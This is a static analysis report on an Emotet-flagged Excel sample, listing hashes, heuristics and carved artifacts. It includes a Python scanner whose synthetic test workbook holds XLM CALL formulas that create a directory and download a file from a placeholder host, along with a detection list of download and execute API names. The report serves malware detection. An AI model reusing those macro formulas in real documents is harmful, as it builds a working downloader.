Emotet — Office (OOXML) / .XLSX malware analysis

Static analysis result for SHA-256 e54aa8ec8fd7e129…

MALICIOUS

Office (OOXML) / .XLSX

Size: 1.20 MB
Created: 2015-06-05 18:19:34 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2022-04-29
MD5: 9d961627266e2e766ede4e5fb64d5e92
SHA-1: 652cb243c3880516ec7f507a5c129ec8fa670acc
SHA-256: e54aa8ec8fd7e12981bbf0a0c54da1a6eac427b86b221979f5efb576d8bc0d32
Risk Score: 200

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The critical heuristic 'OOXML_XLM_BINARY_WINAPI_STRINGS' indicates a binary (BIFF12) Excel 4.0 macro sheet that contains Win32 API and download-related strings. The extracted macro content shows an attempt to create a directory via 'CreateDirectoryA' and a likely execution of a dropped file from a path such as 'C:\Jugfstati\Nydyzba.ooocxx'. Creating a working directory, fetching a payload and launching it from a fixed path is the classic downloader pattern, and the ClamAV signature names Emotet explicitly, which is consistent with the observed techniques.

Heuristics 4

  • Excel 4.0 macro sheet (1 sheet(s)) critical OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
  • Binary XLM macro sheet with WinAPI/download strings critical OOXML_XLM_BINARY_WINAPI_STRINGS
    Excel 4.0 macro sheet is stored as BIFF12/XLSB binary data and contains Win32 download or process-execution API strings such as URLDownloadToFileA, ShellExecuteA, or CreateDirectoryA. These strings are high-signal in XLM macro sheets and catch payload-download macros that XML-formula scanners cannot parse.
  • ClamAV: Xls.Downloader.Emotet-OOXML_XL-af43432fbcb8603c-9980048-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Emotet-OOXML_XL-af43432fbcb8603c-9980048-0
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
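The three structural heuristics above (XLM macro sheet present, binary macro sheet carrying Win32 API names, embedded OLE object) can be reproduced with nothing but the standard library. The scanner below is an added example written for this page, not the report's own engine: it walks the OOXML zip, flags xl/macrosheets/ parts, searches .bin macro sheets for API names in both ANSI and UTF-16LE (BIFF12 stores strings as UTF-16LE), and flags xl/embeddings/ parts that start with the OLE compound-file signature. The API list, the severity labels and the sample workbook it builds are assumptions; the sample reuses the part names from the artifact list but its contents are synthetic.

```python
"""Added example (not the report's own scanner): reproduce the OOXML_XLM_MACROSHEET,
OOXML_XLM_BINARY_WINAPI_STRINGS and OOXML_OLE_OBJECT heuristics with the stdlib only."""
import io
import json
import re
import zipfile

# Win32 API names treated as high-signal inside an Excel 4.0 macro sheet
# (the ones named on this page plus common companions; assumption, not the engine's list).
WINAPI_STRINGS = (
    b"URLDownloadToFileA", b"URLDownloadToFileW",
    b"ShellExecuteA", b"ShellExecuteW",
    b"CreateDirectoryA", b"CreateDirectoryW",
    b"WinExec", b"CreateProcessA", b"CreateProcessW",
)

# OLE compound-file (CFB) magic; every oleObjectN.bin part starts with it.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def _patterns():
    """One ANSI and one UTF-16LE pattern per API name, matched case-insensitively."""
    pats = []
    for name in WINAPI_STRINGS:
        pats.append((name.decode(), re.compile(re.escape(name), re.I)))
        pats.append((name.decode(), re.compile(re.escape(name.decode().encode("utf-16-le")), re.I)))
    return pats


_PATTERNS = _patterns()


def scan_ooxml(blob):
    """Return a list of heuristic hits for one OOXML container (xlsx/xlsm/xlsb bytes)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        names = zf.namelist()

        # Heuristic 1: any Excel 4.0 macro sheet at all (XML or binary).
        macrosheets = sorted(n for n in names if n.startswith("xl/macrosheets/"))
        if macrosheets:
            hits.append({"id": "OOXML_XLM_MACROSHEET", "severity": "critical", "parts": macrosheets})

        # Heuristic 2: binary (BIFF12) macro sheets carrying Win32 download/exec API names.
        # XML macro sheets are skipped here because XML-aware scanners already read them.
        for part in macrosheets:
            if not part.endswith(".bin"):
                continue
            data = zf.read(part)
            found = sorted({name for name, pat in _PATTERNS if pat.search(data)})
            if found:
                hits.append({"id": "OOXML_XLM_BINARY_WINAPI_STRINGS", "severity": "critical",
                             "parts": [part], "strings": found})

        # Heuristic 3: embedded OLE objects, confirmed by the CFB signature rather than the name alone.
        ole_parts = sorted(n for n in names
                           if n.startswith("xl/embeddings/") and zf.read(n)[:8] == OLE_MAGIC)
        if ole_parts:
            hits.append({"id": "OOXML_OLE_OBJECT", "severity": "medium", "parts": ole_parts})
    return hits


def build_sample_workbook():
    """Constructed input: part names mirror the artifact list on this page, contents are synthetic."""
    # Macro cell formulas as BIFF12 would hold them (UTF-16LE), plus one ANSI copy
    # of an API name and the drop path quoted in the report. The URL is a placeholder.
    macro = (b"\x81\x00\x00\x00"
             + '=CALL("Kernel32","CreateDirectoryA","JCJ","C:\\Jugfstati",0)'.encode("utf-16-le")
             + b"\x00\x00"
             + b'=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/x",'
               b'"C:\\Jugfstati\\Nydyzba.ooocxx",0,0)')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        zf.writestr("xl/macrosheets/sheet1.bin", macro)
        zf.writestr("xl/embeddings/oleObject1.bin", OLE_MAGIC + b"\x00" * 504)
    return buf.getvalue()


def build_clean_workbook():
    """Constructed benign workbook: no macro sheet, no embedding."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
    return buf.getvalue()


if __name__ == "__main__":
    print(json.dumps(scan_ooxml(build_sample_workbook()), indent=2))
    print(json.dumps(scan_ooxml(build_clean_workbook())))
```

To run it against a real sample, pass the file's bytes to scan_ooxml(); the only difference from the engine's output is that this version does not decode BIFF12 records, so a name split across several cells by the macro author would be missed, which is why string matching on the raw part is a first pass and not a replacement for the XLM emulation that produced the extracted script content above.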

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename: ooxml_oleobject_00.bin
  SHA-256: 4bad71bbe5a530a4ecb623fd5daea8cac187a6dc6f61565c470ee7261327c19f
  Kind: ooxml-ole-object
  Source: OOXML embedded OLE part: xl/embeddings/oleObject1.bin
  Size: 2706944 bytes

Filename: ooxml_oleobject_00_ole10native_00.bin
  SHA-256: 908a9061823bfb3e7f9f6928ed4da796b96e6132468adee38685b01e1078a8c7
  Kind: ole-package
  Source: OOXML xl/embeddings/oleObject1.bin, Ole10Native stream
  Size: 2683300 bytes

Filename: emf_00.emf
  SHA-256: 33c042ac8babe18b25e94413a9c9fb98a54bbce22a09d1e6fd07f6be12b2b5ec
  Kind: ooxml-emf
  Source: OOXML EMF part: xl/media/image1.emf
  Size: 5367000 bytes

Filename: xlm_sheet_00.bin
  SHA-256: 87833ac5dd31547f952341facc430f1957f03f6a8fc0ad92753af33aeaac7613
  Kind: xlm-macrosheet
  Source: OOXML XLM macro sheet: xl/macrosheets/sheet1.bin
  Size: 2427 bytes